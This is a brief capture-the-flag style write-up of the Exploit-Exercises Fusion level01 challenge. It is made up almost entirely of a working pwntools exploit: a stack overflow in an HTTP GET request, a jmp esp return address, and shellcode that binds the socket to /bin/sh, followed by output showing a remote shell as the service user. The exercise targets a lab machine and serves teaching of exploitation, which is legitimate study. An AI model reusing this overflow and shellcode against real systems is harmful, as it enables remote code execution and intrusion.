[Exploit-Exercise] Fusion level01

Fusion Level01

 - Still NX is disabled but ASLR is on.

- Now, we can't get buffer address from binary.

- All u need is 'jmp esp' gadget

from pwn import *
 
# dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/sh
sc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
 
s = remote('192.168.56.136', 20001)
 
jmp_esp = 0x8049f4f
 
payload = "GET "
payload += "A"*139
payload += p32(jmp_esp)
payload += sc
payload += " HTTP/1.1"
 
s.send(payload)
s.interactive()

zero@ubuntu:~/Desktop$ python fusion.py
[+] Opening connection to 192.168.56.136 on port 20001: Done
[*] Switching to interactive mode
$ id
uid=20001 gid=20001 groups=20001